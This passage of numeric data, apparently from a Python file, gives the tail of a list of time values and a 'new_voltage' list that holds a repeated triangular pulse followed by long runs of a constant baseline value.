11.432, 11.433, 11.435, 11.436, 11.438, 11.439, 11.44, 11.442, 11.443, 11.444, 11.446, 11.447, 11.449, 11.45, 11.451, 11.453, 11.454, 11.456, 11.457, 11.458, 11.46, 11.461, 11.463, 11.464, 11.465, 11.467, 11.468, 11.469, 11.471, 11.472, 11.474, 11.475, 11.476, 11.478, 11.479, 11.481, 11.482, 11.483, 11.485, 11.486, 11.488, 11.489, 11.49, 11.492, 11.493, 11.494, 11.496, 11.497, 11.499, 11.5, 11.501, 11.503, 11.504, 11.506, 11.507, 11.508, 11.51, 11.511, 11.512, 11.514, 11.515, 11.517, 11.518, 11.519, 11.521, 11.522, 11.524, 11.525, 11.526, 11.528, 11.529, 11.531, 11.532, 11.533, 11.535, 11.536, 11.537, 11.539, 11.54, 11.542, 11.543, 11.544, 11.546, 11.547, 11.549, 11.55, 11.551, 11.553, 11.554, 11.556, 11.557, 11.558, 11.56, 11.561, 11.562, 11.564, 11.565, 11.567, 11.568, 11.569, 11.571, 11.572, 11.574, 11.575, 11.576, 11.578, 11.579, 11.581, 11.582, 11.583, 11.585, 11.586, 11.588, 11.589, 11.59, 11.592, 11.593, 11.594, 11.596, 11.597, 11.599, 11.6, 11.601, 11.603, 11.604, 11.606, 11.607, 11.608, 11.61, 11.611, 11.613, 11.614, 11.615, 11.617, 11.618, 11.619, 11.621, 11.622, 11.624, 11.625, 11.626, 11.628, 11.629, 11.631, 11.632, 11.633, 11.635, 11.636, 11.637, 11.639, 11.64, 11.642, 11.643, 11.644, 11.646, 11.647, 11.649, 11.65, 11.651, 11.653, 11.654, 11.656, 11.657, 11.658, 11.66, 11.661, 11.662, 11.664, 11.665, 11.667, 11.668, 11.669, 11.671, 11.672, 11.674, 11.675, 11.676, 11.678, 11.679, 11.681, 11.682, 11.683, 11.685, 11.686, 11.688, 11.689, 11.69, 11.692, 11.693, 11.694, 11.696, 11.697, 11.699, 11.7, 11.701, 11.703, 11.704, 11.706, 11.707, 11.708, 11.71, 11.711, 11.713, 11.714, 11.715, 11.717, 11.718, 11.719, 11.721, 11.722, 11.724, 11.725, 11.726, 11.728, 11.729, 11.731, 11.732, 11.733, 11.735, 11.736, 11.738, 11.739, 11.74, 11.742, 11.743, 11.744, 11.746, 11.747, 11.749, 11.75, 11.751, 11.753, 11.754, 11.756, 11.757, 11.758, 11.76, 11.761, 11.762, 11.764, 11.765, 11.767, 11.768, 11.769, 11.771, 11.772, 11.774, 11.775, 11.776, 11.778, 11.779, 11.781, 11.782, 
11.783, 11.785, 11.786, 11.787, 11.789, 11.79, 11.792, 11.793, 11.794, 11.796, 11.797, 11.799, 11.8, 11.801, 11.803, 11.804, 11.806, 11.807, 11.808, 11.81, 11.811, 11.812, 11.814, 11.815, 11.817, 11.818, 11.819, 11.821, 11.822, 11.824, 11.825, 11.826, 11.828, 11.829, 11.831, 11.832, 11.833, 11.835, 11.836, 11.838, 11.839, 11.84, 11.842, 11.843, 11.844, 11.846, 11.847, 11.849, 11.85, 11.851, 11.853, 11.854, 11.856, 11.857, 11.858, 11.86, 11.861, 11.863, 11.864, 11.865, 11.867, 11.868, 11.869, 11.871, 11.872, 11.874, 11.875, 11.876, 11.878, 11.879, 11.881, 11.882, 11.883, 11.885, 11.886, 11.887, 11.889, 11.89, 11.892, 11.893, 11.894, 11.896, 11.897, 11.899, 11.9, 11.901, 11.903, 11.904, 11.906, 11.907, 11.908, 11.91, 11.911, 11.912, 11.914, 11.915, 11.917, 11.918, 11.919, 11.921, 11.922, 11.924, 11.925, 11.926, 11.928, 11.929, 11.931, 11.932, 11.933, 11.935, 11.936, 11.938, 11.939, 11.94, 11.942, 11.943, 11.944, 11.946, 11.947, 11.949, 11.95, 11.951, 11.953, 11.954, 11.956, 11.957, 11.958, 11.96, 11.961, 11.963, 11.964, 11.965, 11.967, 11.968, 11.969, 11.971, 11.972, 11.974, 11.975, 11.976, 11.978, 11.979, 11.981, 11.982, 11.983, 11.985, 11.986, 11.988, 11.989, 11.99, 11.992, 11.993, 11.994, 11.996, 11.997, 11.999, 12.0, 12.001, 12.003, 12.004, 12.006, 12.007, 12.008, 12.01, 12.011, 12.012, 12.014, 12.015, 12.017, 12.018, 12.019, 12.021, 12.022, 12.024, 12.025, 12.026, 12.028, 12.029, 12.031, 12.032, 12.033, 12.035, 12.036, 12.037, 12.039, 12.04, 12.042, 12.043, 12.044, 12.046, 12.047, 12.049, 12.05, 12.051, 12.053, 12.054, 12.056, 12.057, 12.058, 12.06, 12.061, 12.062, 12.064, 12.065, 12.067, 12.068, 12.069, 12.071, 12.072, 12.074, 12.075, 12.076, 12.078, 12.079, 12.081, 12.082, 12.083, 12.085, 12.086, 12.088, 12.089, 12.09, 12.092, 12.093, 12.094, 12.096, 12.097, 12.099, 12.1, 12.101, 12.103, 12.104, 12.106, 12.107, 12.108, 12.11, 12.111, 12.113, 12.114, 12.115, 12.117, 12.118, 12.119, 12.121, 12.122, 12.124, 12.125, 12.126, 12.128, 12.129, 12.131, 12.132, 12.133, 
12.135, 12.136, 12.137, 12.139, 12.14, 12.142, 12.143, 12.144, 12.146, 12.147, 12.149, 12.15, 12.151, 12.153, 12.154, 12.156, 12.157, 12.158, 12.16, 12.161, 12.162, 12.164, 12.165, 12.167, 12.168, 12.169, 12.171, 12.172, 12.174, 12.175, 12.176, 12.178, 12.179, 12.181, 12.182, 12.183, 12.185, 12.186, 12.188, 12.189, 12.19, 12.192, 12.193, 12.194, 12.196, 12.197, 12.199, 12.2, 12.201, 12.203, 12.204, 12.206, 12.207, 12.208, 12.21, 12.211, 12.213, 12.214, 12.215, 12.217, 12.218, 12.219, 12.221, 12.222, 12.224, 12.225, 12.226, 12.228, 12.229, 12.231, 12.232, 12.233, 12.235, 12.236, 12.238, 12.239, 12.24, 12.242, 12.243, 12.244, 12.246, 12.247, 12.249, 12.25, 12.251, 12.253, 12.254, 12.256, 12.257, 12.258, 12.26, 12.261, 12.262, 12.264, 12.265, 12.267, 12.268, 12.269, 12.271, 12.272, 12.274, 12.275, 12.276, 12.278, 12.279, 12.281, 12.282, 12.283, 12.285, 12.286, 12.287, 12.289, 12.29, 12.292, 12.293, 12.294, 12.296, 12.297, 12.299, 12.3, 12.301, 12.303, 12.304, 12.306, 12.307, 12.308, 12.31, 12.311, 12.312, 12.314, 12.315, 12.317, 12.318, 12.319, 12.321, 12.322, 12.324, 12.325, 12.326, 12.328, 12.329, 12.331, 12.332, 12.333, 12.335, 12.336, 12.338, 12.339, 12.34, 12.342, 12.343, 12.344, 12.346, 12.347, 12.349, 12.35, 12.351, 12.353, 12.354, 12.356, 12.357, 12.358, 12.36, 12.361, 12.363, 12.364, 12.365, 12.367, 12.368, 12.369, 12.371, 12.372, 12.374, 12.375, 12.376, 12.378, 12.379, 12.381, 12.382, 12.383, 12.385, 12.386, 12.387, 12.389, 12.39, 12.392, 12.393, 12.394, 12.396, 12.397, 12.399, 12.4, 12.401, 12.403, 12.404, 12.406, 12.407, 12.408, 12.41, 12.411, 12.412, 12.414, 12.415, 12.417, 12.418, 12.419, 12.421, 12.422, 12.424, 12.425, 12.426, 12.428, 12.429, 12.431, 12.432, 12.433, 12.435, 12.436, 12.438, 12.439, 12.44, 12.442, 12.443, 12.444, 12.446, 12.447, 12.449, 12.45, 12.451, 12.453, 12.454, 12.456, 12.457, 12.458, 12.46, 12.461, 12.463, 12.464, 12.465, 12.467, 12.468, 12.469, 12.471, 12.472, 12.474, 12.475, 12.476, 12.478, 12.479, 12.481, 12.482, 12.483, 12.485, 
12.486, 12.488, 12.489, 12.49, 12.492, 12.493, 12.494, 12.496, 12.497, 12.499, 12.5, 12.501, 12.503, 12.504, 12.506, 12.507, 12.508, 12.51, 12.511, 12.512, 12.514, 12.515, 12.517, 12.518, 12.519, 12.521, 12.522, 12.524, 12.525, 12.526, 12.528, 12.529, 12.531, 12.532, 12.533, 12.535, 12.536, 12.537, 12.539, 12.54, 12.542, 12.543, 12.544, 12.546, 12.547, 12.549, 12.55, 12.551, 12.553, 12.554, 12.556, 12.557, 12.558, 12.56, 12.561, 12.562, 12.564, 12.565, 12.567, 12.568, 12.569, 12.571, 12.572, 12.574, 12.575, 12.576, 12.578, 12.579, 12.581, 12.582, 12.583, 12.585, 12.586, 12.588, 12.589, 12.59, 12.592, 12.593, 12.594, 12.596, 12.597, 12.599, 12.6, 12.601, 12.603, 12.604, 12.606, 12.607, 12.608, 12.61, 12.611, 12.613, 12.614, 12.615, 12.617, 12.618, 12.619, 12.621, 12.622, 12.624, 12.625, 12.626, 12.628, 12.629, 12.631, 12.632, 12.633, 12.635, 12.636, 12.637, 12.639, 12.64, 12.642, 12.643, 12.644, 12.646, 12.647, 12.649, 12.65, 12.651, 12.653, 12.654, 12.656, 12.657, 12.658, 12.66, 12.661, 12.662, 12.664, 12.665, 12.667, 12.668, 12.669, 12.671, 12.672, 12.674, 12.675, 12.676, 12.678, 12.679, 12.681, 12.682, 12.683, 12.685, 12.686, 12.688, 12.689, 12.69, 12.692, 12.693, 12.694, 12.696, 12.697, 12.699, 12.7, 12.701, 12.703, 12.704, 12.706, 12.707, 12.708, 12.71, 12.711, 12.713, 12.714, 12.715, 12.717, 12.718, 12.719, 12.721, 12.722, 12.724, 12.725, 12.726, 12.728, 12.729, 12.731, 12.732, 12.733, 12.735, 12.736, 12.738, 12.739, 12.74, 12.742, 12.743, 12.744, 12.746, 12.747, 12.749, 12.75, 12.751, 12.753, 12.754, 12.756, 12.757, 12.758, 12.76, 12.761, 12.762, 12.764, 12.765, 12.767, 12.768, 12.769, 12.771, 12.772, 12.774, 12.775, 12.776, 12.778, 12.779, 12.781, 12.782, 12.783, 12.785, 12.786, 12.787, 12.789, 12.79, 12.792, 12.793, 12.794, 12.796, 12.797, 12.799, 12.8, 12.801, 12.803, 12.804, 12.806, 12.807, 12.808, 12.81, 12.811, 12.812, 12.814, 12.815, 12.817, 12.818, 12.819, 12.821, 12.822, 12.824, 12.825, 12.826, 12.828, 12.829, 12.831, 12.832, 12.833, 12.835, 12.836, 
12.838, 12.839, 12.84, 12.842, 12.843, 12.844, 12.846, 12.847, 12.849, 12.85, 12.851, 12.853, 12.854, 12.856, 12.857, 12.858, 12.86, 12.861, 12.863, 12.864, 12.865, 12.867, 12.868, 12.869, 12.871, 12.872, 12.874, 12.875, 12.876, 12.878, 12.879, 12.881, 12.882, 12.883, 12.885, 12.886, 12.887, 12.889, 12.89, 12.892, 12.893, 12.894, 12.896, 12.897, 12.899, 12.9, 12.901, 12.903, 12.904, 12.906, 12.907, 12.908, 12.91, 12.911, 12.912, 12.914, 12.915, 12.917, 12.918, 12.919, 12.921, 12.922, 12.924, 12.925, 12.926, 12.928, 12.929, 12.931, 12.932, 12.933, 12.935, 12.936, 12.938, 12.939, 12.94, 12.942, 12.943, 12.944, 12.946, 12.947, 12.949, 12.95, 12.951, 12.953, 12.954, 12.956, 12.957, 12.958, 12.96, 12.961, 12.963, 12.964, 12.965, 12.967, 12.968, 12.969, 12.971, 12.972, 12.974, 12.975, 12.976, 12.978, 12.979, 12.981, 12.982, 12.983, 12.985, 12.986, 12.988, 12.989, 12.99, 12.992, 12.993, 12.994, 12.996, 12.997, 12.999, 13.0, 13.001, 13.003, 13.004, 13.006, 13.007, 13.008, 13.01, 13.011, 13.012, 13.014, 13.015, 13.017, 13.018, 13.019, 13.021, 13.022, 13.024, 13.025, 13.026, 13.028, 13.029, 13.031, 13.032, 13.033, 13.035, 13.036, 13.037, 13.039, 13.04, 13.042, 13.043, 13.044, 13.046, 13.047, 13.049, 13.05, 13.051, 13.053, 13.054, 13.056, 13.057, 13.058, 13.06, 13.061, 13.062, 13.064, 13.065, 13.067, 13.068, 13.069, 13.071, 13.072, 13.074, 13.075, 13.076, 13.078, 13.079, 13.081, 13.082, 13.083, 13.085, 13.086, 13.088, 13.089, 13.09, 13.092, 13.093, 13.094, 13.096, 13.097, 13.099, 13.1, 13.101, 13.103, 13.104, 13.106, 13.107, 13.108, 13.11, 13.111, 13.113, 13.114, 13.115, 13.117, 13.118, 13.119, 13.121, 13.122, 13.124, 13.125, 13.126, 13.128, 13.129, 13.131, 13.132, 13.133, 13.135, 13.136, 13.137, 13.139, 13.14, 13.142, 13.143, 13.144, 13.146, 13.147, 13.149, 13.15, 13.151, 13.153, 13.154, 13.156, 13.157, 13.158, 13.16, 13.161, 13.162, 13.164, 13.165, 13.167, 13.168, 13.169, 13.171, 13.172, 13.174, 13.175, 13.176, 13.178, 13.179, 13.181, 13.182, 13.183, 13.185, 13.186, 13.188, 
13.189, 13.19, 13.192, 13.193, 13.194, 13.196, 13.197, 13.199, 13.2, 13.201, 13.203, 13.204, 13.206, 13.207, 13.208, 13.21, 13.211, 13.213, 13.214, 13.215, 13.217, 13.218, 13.219, 13.221, 13.222, 13.224, 13.225, 13.226, 13.228, 13.229, 13.231, 13.232, 13.233, 13.235, 13.236, 13.238, 13.239, 13.24, 13.242, 13.243, 13.244, 13.246, 13.247, 13.249, 13.25, 13.251, 13.253, 13.254, 13.256, 13.257, 13.258, 13.26, 13.261, 13.262, 13.264, 13.265, 13.267, 13.268, 13.269, 13.271, 13.272, 13.274, 13.275, 13.276, 13.278, 13.279, 13.281, 13.282, 13.283, 13.285, 13.286, 13.287, 13.289, 13.29, 13.292, 13.293, 13.294, 13.296, 13.297, 13.299, 13.3, 13.301, 13.303, 13.304, 13.306, 13.307, 13.308, 13.31, 13.311, 13.312, 13.314, 13.315, 13.317, 13.318, 13.319, 13.321, 13.322, 13.324, 13.325, 13.326, 13.328, 13.329, 13.331, 13.332, 13.333, 13.335, 13.336, 13.338, 13.339, 13.34, 13.342, 13.343, 13.344, 13.346, 13.347, 13.349, 13.35, 13.351, 13.353, 13.354, 13.356, 13.357, 13.358, 13.36, 13.361, 13.363, 13.364, 13.365, 13.367, 13.368, 13.369, 13.371, 13.372, 13.374, 13.375, 13.376, 13.378, 13.379, 13.381, 13.382, 13.383, 13.385, 13.386, 13.387, 13.389, 13.39, 13.392, 13.393, 13.394, 13.396, 13.397, 13.399, 13.4, 13.401, 13.403, 13.404, 13.406, 13.407, 13.408, 13.41, 13.411, 13.412, 13.414, 13.415, 13.417, 13.418, 13.419, 13.421, 13.422, 13.424, 13.425, 13.426, 13.428, 13.429, 13.431, 13.432, 13.433, 13.435, 13.436, 13.438, 13.439, 13.44, 13.442, 13.443, 13.444, 13.446, 13.447, 13.449, 13.45, 13.451, 13.453, 13.454, 13.456, 13.457, 13.458, 13.46, 13.461, 13.463, 13.464, 13.465, 13.467, 13.468, 13.469, 13.471, 13.472, 13.474, 13.475, 13.476, 13.478, 13.479, 13.481, 13.482, 13.483, 13.485, 13.486, 13.488, 13.489, 13.49, 13.492, 13.493, 13.494, 13.496, 13.497, 13.499, 13.5, 13.501, 13.503, 13.504, 13.506, 13.507, 13.508, 13.51, 13.511, 13.512, 13.514, 13.515, 13.517, 13.518, 13.519, 13.521, 13.522, 13.524, 13.525, 13.526, 13.528, 13.529, 13.531, 13.532, 13.533, 13.535, 13.536, 13.537, 13.539, 
13.54, 13.542, 13.543, 13.544, 13.546, 13.547, 13.549, 13.55, 13.551, 13.553, 13.554, 13.556, 13.557, 13.558, 13.56, 13.561, 13.562, 13.564, 13.565, 13.567, 13.568, 13.569, 13.571, 13.572, 13.574, 13.575, 13.576, 13.578, 13.579, 13.581, 13.582, 13.583, 13.585, 13.586, 13.588, 13.589, 13.59, 13.592, 13.593, 13.594, 13.596, 13.597, 13.599, 13.6, 13.601, 13.603, 13.604, 13.606, 13.607, 13.608, 13.61, 13.611, 13.613, 13.614, 13.615, 13.617, 13.618, 13.619, 13.621, 13.622, 13.624, 13.625, 13.626, 13.628, 13.629, 13.631, 13.632, 13.633, 13.635, 13.636, 13.637, 13.639, 13.64, 13.642, 13.643, 13.644, 13.646, 13.647, 13.649, 13.65, 13.651, 13.653, 13.654, 13.656, 13.657, 13.658, 13.66, 13.661, 13.662, 13.664, 13.665, 13.667, 13.668, 13.669, 13.671, 13.672, 13.674, 13.675, 13.676, 13.678, 13.679, 13.681, 13.682, 13.683, 13.685, 13.686, 13.688, 13.689, 13.69, 13.692, 13.693, 13.694, 13.696, 13.697, 13.699, 13.7, 13.701, 13.703, 13.704, 13.706, 13.707, 13.708, 13.71, 13.711, 13.713, 13.714, 13.715, 13.717, 13.718, 13.719, 13.721, 13.722, 13.724, 13.725, 13.726, 13.728, 13.729, 13.731, 13.732, 13.733, 13.735, 13.736, 13.738, 13.739, 13.74, 13.742, 13.743, 13.744, 13.746, 13.747, 13.749, 13.75, 13.751, 13.753, 13.754, 13.756, 13.757, 13.758, 13.76, 13.761, 13.762, 13.764, 13.765, 13.767, 13.768, 13.769, 13.771, 13.772, 13.774, 13.775, 13.776, 13.778, 13.779, 13.781, 13.782, 13.783, 13.785, 13.786, 13.787, 13.789, 13.79, 13.792, 13.793, 13.794, 13.796, 13.797, 13.799, 13.8, 13.801, 13.803, 13.804, 13.806, 13.807, 13.808, 13.81, 13.811, 13.812, 13.814, 13.815, 13.817, 13.818, 13.819, 13.821, 13.822, 13.824, 13.825, 13.826, 13.828, 13.829, 13.831, 13.832, 13.833, 13.835, 13.836, 13.838, 13.839, 13.84, 13.842, 13.843, 13.844, 13.846, 13.847, 13.849, 13.85, 13.851, 13.853, 13.854, 13.856, 13.857, 13.858, 13.86, 13.861, 13.863, 13.864, 13.865, 13.867, 13.868, 13.869, 13.871, 13.872, 13.874, 13.875, 13.876, 13.878, 13.879, 13.881, 13.882, 13.883, 13.885, 13.886, 13.887]
new_voltage = [-0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 